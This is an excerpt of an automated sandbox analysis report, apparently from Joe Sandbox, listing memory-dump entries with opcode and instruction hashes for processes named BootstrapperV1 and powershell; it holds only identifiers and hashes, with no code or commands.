                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 89955ebc511d68c2aed77571c3d2fab2a84fa82596ab1d7be192b430db18545c
                                                                                                                                                        • Instruction ID: 42cca133c4a98c3964e2d4093563a98681d7c013a747178f2b5812c1ed08a40d
                                                                                                                                                        • Opcode Fuzzy Hash: 89955ebc511d68c2aed77571c3d2fab2a84fa82596ab1d7be192b430db18545c
                                                                                                                                                        • Instruction Fuzzy Hash: 30219242A4F7C64FE397937C48692613FD5DF9B52070942FBD088CB1A3C8098C0A8391
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 7f9f6811a1911951692009a830456ae1a0775f287d5647ff9ea5878981cd8a13
                                                                                                                                                        • Instruction ID: b9d79e42f7f2008b7a59b48180744b868831f0c6754f72fc2d05a519efb8e052
                                                                                                                                                        • Opcode Fuzzy Hash: 7f9f6811a1911951692009a830456ae1a0775f287d5647ff9ea5878981cd8a13
                                                                                                                                                        • Instruction Fuzzy Hash: 8A214670A9F7C74FE342ABF444161EABBD09F47360B4444E9D08ACB292CA1D1C4A8751
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 6f5fd0541c459a628479a377ca6e40f0858ee1b8a423b35a290fa367a9e7124f
                                                                                                                                                        • Instruction ID: ce9fa956c1f3096998b913c5c2e403a45efe57c0be7a249156c60e819cbc2f1f
                                                                                                                                                        • Opcode Fuzzy Hash: 6f5fd0541c459a628479a377ca6e40f0858ee1b8a423b35a290fa367a9e7124f
                                                                                                                                                        • Instruction Fuzzy Hash: 18210862D9D6968FE301F37CA89A0F97F90EF47724B1481BBD04DCA0A3EC19544943D2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 6c354d657e9fe3ebeebc1fbba762b07ead46e75e6766dea3fa5c47589f5c2211
                                                                                                                                                        • Instruction ID: a0faa087a17c4ad15ac213263e50c0f06e30113686f3a99e8c039a23541f3e98
                                                                                                                                                        • Opcode Fuzzy Hash: 6c354d657e9fe3ebeebc1fbba762b07ead46e75e6766dea3fa5c47589f5c2211
                                                                                                                                                        • Instruction Fuzzy Hash: D7213630B5D68B8FE741AFB9C4166EABBD1DF563A0F0405BED04EC7192CE1C88498781
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 937be3ccc3e393e27c139b54c3778c0d75be724de512599232b9aa69b60f6a6d
                                                                                                                                                        • Instruction ID: 489f919b1552b7ab9154114abe382a9ecd1013b9a04e261e1b69d3a8be8967ba
                                                                                                                                                        • Opcode Fuzzy Hash: 937be3ccc3e393e27c139b54c3778c0d75be724de512599232b9aa69b60f6a6d
                                                                                                                                                        • Instruction Fuzzy Hash: E4110462B1EE8A8FF695826C1C571742EC4DF9A30070941FBE40ECB2E2DA4ACC098385
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 83f2ae930cf80c77905c2b46e6342da2c348578413ef3e333255bc20d43e86cd
                                                                                                                                                        • Instruction ID: a541be2e83ebaf88f235c4918025d0fda22a0d9e24c58791a5b736f24f137494
                                                                                                                                                        • Opcode Fuzzy Hash: 83f2ae930cf80c77905c2b46e6342da2c348578413ef3e333255bc20d43e86cd
                                                                                                                                                        • Instruction Fuzzy Hash: 6A11E97295DA8D8FFB90EBA998055B97BE4FB8A310F0402AAF01DC31D2DB549C0987C1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 9c2748c4727a233895167f76be74cd851905e62fad4ec553a4d438117b180ce0
                                                                                                                                                        • Instruction ID: 2626e29f6d470722095bbc96110f3828f18f00535c4b471403c6f5f7aa9092ed
                                                                                                                                                        • Opcode Fuzzy Hash: 9c2748c4727a233895167f76be74cd851905e62fad4ec553a4d438117b180ce0
                                                                                                                                                        • Instruction Fuzzy Hash: 37112522B1ED5A4BFAD4819D2C571752EC4DB9A31070441FBF50EC72A5DD4BCC4982C5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 37fc3a1773a94b5b3cb0b4982670f285bd73a8d541352e57a4754e1ef2326aaa
                                                                                                                                                        • Instruction ID: ea3794c58c2427b792419df23cfb171263215d61a244c0601d4cb32103c83267
                                                                                                                                                        • Opcode Fuzzy Hash: 37fc3a1773a94b5b3cb0b4982670f285bd73a8d541352e57a4754e1ef2326aaa
                                                                                                                                                        • Instruction Fuzzy Hash: 3511266154EBC65FF362A37898565B13FD8EF5725070A00FBE08CC71A3D80D9C8A83A1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 0fe8100da750e174c7d265c49b157eae52def5e58fc0c01b913aa2f818ef0278
                                                                                                                                                        • Instruction ID: 0c509a7bbaf8ffe88235ca0b34d299ee8843a6af5249b4c4904f2868dd1eea66
                                                                                                                                                        • Opcode Fuzzy Hash: 0fe8100da750e174c7d265c49b157eae52def5e58fc0c01b913aa2f818ef0278
                                                                                                                                                        • Instruction Fuzzy Hash: 0911297189EA895FF740D7695C055FA3BE8EB8A320B0442A7F01DC35D2CA5C994683D1
Memory Dump Source
• Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 612f3edcd1296fe7bb8bc7dc1d4eb5aded6651c64b5b675f4699021ca139c3bc
                                                                                                                                                        • Instruction ID: 992306e92e73db208d6c9f79e722fa11aa9f16701542e1e03138ac68e4367dea
                                                                                                                                                        • Opcode Fuzzy Hash: 612f3edcd1296fe7bb8bc7dc1d4eb5aded6651c64b5b675f4699021ca139c3bc
                                                                                                                                                        • Instruction Fuzzy Hash: D7F0BE42E4FE9B0FE696936C28641B42B91EB9612074902F7E44CCB19ADE4E8D4A03D2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: d7b15803618bdb6e2cf3706307403d173f304ff4bbddb05ceac6edea17d7719b
                                                                                                                                                        • Instruction ID: 0ed69bbb28db5ce41911b9a03d47bd97082d355c57b930a38f468a256885778b
                                                                                                                                                        • Opcode Fuzzy Hash: d7b15803618bdb6e2cf3706307403d173f304ff4bbddb05ceac6edea17d7719b
                                                                                                                                                        • Instruction Fuzzy Hash: CBF0B431A4980FCEF678920E955D77366D8DB4B2B0F114076F44EC21A2E8489C468290
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 2208458ea3337caba51d32b6d2570281306d17c1f4f7547c3f3fabed693642a0
                                                                                                                                                        • Instruction ID: 872a901ccec7e5550ae98b9d9ad30c6d12673bb626dc49804f0f42616203b91a
                                                                                                                                                        • Opcode Fuzzy Hash: 2208458ea3337caba51d32b6d2570281306d17c1f4f7547c3f3fabed693642a0
                                                                                                                                                        • Instruction Fuzzy Hash: 0801AD7081878E8FDB46EF2888140BA7FF0FF56200B4005EBE419C61A2DE7945148381
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 62c63945a5d2e9bb5b4fde0242ae6ea8ee5af2c8dc215b8311a09489223fd010
                                                                                                                                                        • Instruction ID: 0b5ff59c6396bbf2d82b74a9ace4e661eb0379eba9d6c856220523d863b10e43
                                                                                                                                                        • Opcode Fuzzy Hash: 62c63945a5d2e9bb5b4fde0242ae6ea8ee5af2c8dc215b8311a09489223fd010
                                                                                                                                                        • Instruction Fuzzy Hash: BDF0F660758D0B8FEA88EB28D440DB573D5FF943407508575D00FC3185DD28E8464780
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 6dada96357b2b12311360f90bbe880902a4907852e00db6f248d02fcd0e128b1
                                                                                                                                                        • Instruction ID: 18f6ac1e8f0ce889621f93b660d574a19af31edc9f0062c341336bf3e3c17169
                                                                                                                                                        • Opcode Fuzzy Hash: 6dada96357b2b12311360f90bbe880902a4907852e00db6f248d02fcd0e128b1
                                                                                                                                                        • Instruction Fuzzy Hash: D8F0FE71A6CB088B9F44AF4CBC434AD77D0FB99B60F10116FF94943251D621F8968AC7
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: aa68fdef3fae00141618e6784d6d534a48af09598541584514b03e04e8ff38ce
                                                                                                                                                        • Instruction ID: 2c8377f4d7250b496702eb52d73a26ff5c46de064b127a10826b3c9b03509247
                                                                                                                                                        • Opcode Fuzzy Hash: aa68fdef3fae00141618e6784d6d534a48af09598541584514b03e04e8ff38ce
                                                                                                                                                        • Instruction Fuzzy Hash: A9F0377275D61D8FB148AB1C64031B973C6DB8A960B1081AFE48FC3247DD15A90B47D5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 2ec6d8332cd559b4c4a249c1beab5c9575af8f3aa59987c33e016e7253bdbf75
                                                                                                                                                        • Instruction ID: 4e36d6b5a8766b4a055a5fdd727af2262a0bc4ad1b2277063c92e700ae9dc00f
                                                                                                                                                        • Opcode Fuzzy Hash: 2ec6d8332cd559b4c4a249c1beab5c9575af8f3aa59987c33e016e7253bdbf75
                                                                                                                                                        • Instruction Fuzzy Hash: EDF0C82045EACB4FF316973894545A17BE4AF47310B4D45F6E48CCB293DA1DE8898791
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 13f62b51865d5e37914c5c3fa70c3395a2f313d71ec6588268fc32fdebbf12c0
                                                                                                                                                        • Instruction ID: 5df2c4be939d7aba554a17f946c2817638b0326823847d0d10aa70970b3c6891
                                                                                                                                                        • Opcode Fuzzy Hash: 13f62b51865d5e37914c5c3fa70c3395a2f313d71ec6588268fc32fdebbf12c0
                                                                                                                                                        • Instruction Fuzzy Hash: 13F0EC21759D0E4BE558A32C54457BD62D5DB96311F4046BAE40EC3285DD5EE84A43C1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: a6ba270d170d36dbacb7eda4adcfdb6475d2e79544dee6c399c68d403a0ca7d1
                                                                                                                                                        • Instruction ID: c92bd32c4b4af78f2e478298ad2758b9e4d1cf626a1dc9a7cb157c5cbbd951ec
                                                                                                                                                        • Opcode Fuzzy Hash: a6ba270d170d36dbacb7eda4adcfdb6475d2e79544dee6c399c68d403a0ca7d1
                                                                                                                                                        • Instruction Fuzzy Hash: 3DF0CD8090E3C10FF70797B8082A2A6BFE19F57220B4D84EAD0C8CF093E51D844E8352
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: a7c43fb8982f11d1c945227b6eb22ffde140f13e7e11340ba26b439f99dbe245
                                                                                                                                                        • Instruction ID: b8b8e5bc706dce0dbbeb2d5eb220bb9252ce915e9d1bd190f2aa86ff64242067
                                                                                                                                                        • Opcode Fuzzy Hash: a7c43fb8982f11d1c945227b6eb22ffde140f13e7e11340ba26b439f99dbe245
                                                                                                                                                        • Instruction Fuzzy Hash: CDF0B470E4E68B8FF340ABF900061AABBE0DF9A2A074105FED04DC7296C91D484A4780
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 653da305b3a38a7e77e97b22f5dc9f57a0e9ad280d3195d865991233d9cbc362
                                                                                                                                                        • Instruction ID: ad5a32ebdb3f72a8012ffb9a520014d42b26ff08642b4ff195c3ed4ee45f109b
                                                                                                                                                        • Opcode Fuzzy Hash: 653da305b3a38a7e77e97b22f5dc9f57a0e9ad280d3195d865991233d9cbc362
                                                                                                                                                        • Instruction Fuzzy Hash: 5AF0595165E98B4FEF48E32868819B867C1DF5020070484FDD00EC719BCD29D94E8382
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: a5b44bfe0fd1ef53c489d1c70acb6e0507cf327a15287e60ca4d3b1489cb10ed
                                                                                                                                                        • Instruction ID: 2e82b17f8d16199f361ea2b9b891ab7b931418e122c8ff9b6ef681d10769b709
                                                                                                                                                        • Opcode Fuzzy Hash: a5b44bfe0fd1ef53c489d1c70acb6e0507cf327a15287e60ca4d3b1489cb10ed
                                                                                                                                                        • Instruction Fuzzy Hash: 1BE02213A4D42A0AFA6472BCF4603F833408F0A328F0881B3E08CC51D3DC491C4502C1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: c85c7fbae1f8e7908c714170d9b63718d7f9e673828d75f5cf91c394a5063c02
                                                                                                                                                        • Instruction ID: 24ae8b85fad144d2c6d9a6c38743ee4c2ff26052e32e9c59351bf0a7c9028b99
                                                                                                                                                        • Opcode Fuzzy Hash: c85c7fbae1f8e7908c714170d9b63718d7f9e673828d75f5cf91c394a5063c02
                                                                                                                                                        • Instruction Fuzzy Hash: 7FE02BA280E3C28FF755572548471A93FC0BF66210F4C82FAE08CCA0D3EA1DD54D4282
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 4359b9667766aabe86bef7fcd41b57be476a211f51df856423158e4064a2a747
                                                                                                                                                        • Instruction ID: ae828956f7b7cede2fe31e0f4d6a8a28bafc11db4c01216c9e1b129f6d9c844e
                                                                                                                                                        • Opcode Fuzzy Hash: 4359b9667766aabe86bef7fcd41b57be476a211f51df856423158e4064a2a747
                                                                                                                                                        • Instruction Fuzzy Hash: 2DD0A711B58E09078564A73CA8001AAA2D1EB843307408776D01BC32C9EE2894434381
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: c9838e51c598b0b4f8d18f9569f7d327ffb67589357cb5876311d14c4a714a12
                                                                                                                                                        • Instruction ID: 2ac93a26b74563683cf47f282685b7ff6de0abac1018fdd4eb3e63ec51ff8fc4
                                                                                                                                                        • Opcode Fuzzy Hash: c9838e51c598b0b4f8d18f9569f7d327ffb67589357cb5876311d14c4a714a12
                                                                                                                                                        • Instruction Fuzzy Hash: 75D05B3190894ECFEFC4DF5CD4619ADFBB1EB9B300F104155E11CD35D2C62498458780
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 3b199c7db29a0555a7ea2d430dad342ee8e14e956db0a55e7f56215082f33101
                                                                                                                                                        • Instruction ID: 9e81c14e39574058c124983491c99b5d0fbb472f09bf22b8e8dffdb658d4e1ee
                                                                                                                                                        • Opcode Fuzzy Hash: 3b199c7db29a0555a7ea2d430dad342ee8e14e956db0a55e7f56215082f33101
                                                                                                                                                        • Instruction Fuzzy Hash: EEC01232A4580D8E9F80EB8CA0016ECBBA0EB8A221F081032E10DE2200CA2554544790
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: M_^$M_^$M_^#$M_^$
                                                                                                                                                        • API String ID: 0-3697010251
                                                                                                                                                        • Opcode ID: 0994cab780b5ece05cb381b6c4879c0e6fef08567a648d6cb1ca2a5b375b851f
                                                                                                                                                        • Instruction ID: 000bfad20605a1e42aa73b809f516f55975fd77d0122fdc015e73e7bd193135d
                                                                                                                                                        • Opcode Fuzzy Hash: 0994cab780b5ece05cb381b6c4879c0e6fef08567a648d6cb1ca2a5b375b851f
                                                                                                                                                        • Instruction Fuzzy Hash: F231D2B3D5E657CAF22A6619E4040A4B7D4AF22325F4987F6D06DCA1D3BD1EB80842C1
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: M_^$M_^$M_^$M_^
                                                                                                                                                        • API String ID: 0-1397233021
                                                                                                                                                        • Opcode ID: 6b1b77d5fc1c030e5cb09ff5c9a764954e6e33477e91594cf5e6aa3da01898a9
                                                                                                                                                        • Instruction ID: 2dbcd2aab1d6e36a72db4d0304df841bd1da1172deae87e7b165390bab46ac65
                                                                                                                                                        • Opcode Fuzzy Hash: 6b1b77d5fc1c030e5cb09ff5c9a764954e6e33477e91594cf5e6aa3da01898a9
                                                                                                                                                        • Instruction Fuzzy Hash: C62185F394A687CFF34A471D8C6E0A57BD4EF2121878E42F5E05DCB193FD19940A4681
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: M_^$M_^$M_^$M_^
                                                                                                                                                        • API String ID: 0-1397233021
                                                                                                                                                        • Opcode ID: 751f715fe1f50b5e670cd57fa833168263d5768d9f59de02df4d3f94640838c7
                                                                                                                                                        • Instruction ID: eea7fdc3aaef0c5307416eeaf9d6cc548e976f1ddecaaf9b04544dba289dc0f7
                                                                                                                                                        • Opcode Fuzzy Hash: 751f715fe1f50b5e670cd57fa833168263d5768d9f59de02df4d3f94640838c7
                                                                                                                                                        • Instruction Fuzzy Hash: 972194B394A683CFF24A472D886E0A53FD4EF2131874E42F5E05D8B193FD1DA40A4681
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000010.00000002.1357871941.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ffaac580000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: fd256994c9ecdbc561070e206d9422e1a15dec266b4ddf87e6aa8a953a45cb46
                                                                                                                                                        • Instruction ID: 13ec98312dc56f89611b463633c08ba61c1f3b8f2f8b3cf0caad49eed02db02c
                                                                                                                                                        • Opcode Fuzzy Hash: fd256994c9ecdbc561070e206d9422e1a15dec266b4ddf87e6aa8a953a45cb46
                                                                                                                                                        • Instruction Fuzzy Hash: BBD15C30A18A4E8FEF85DF58C455AA97BE1FF69300F14816AE40DD7296CE34E885CBC1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000010.00000002.1358351985.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ffaac650000_powershell.jbxd
                                                                                                                                                        Similarity
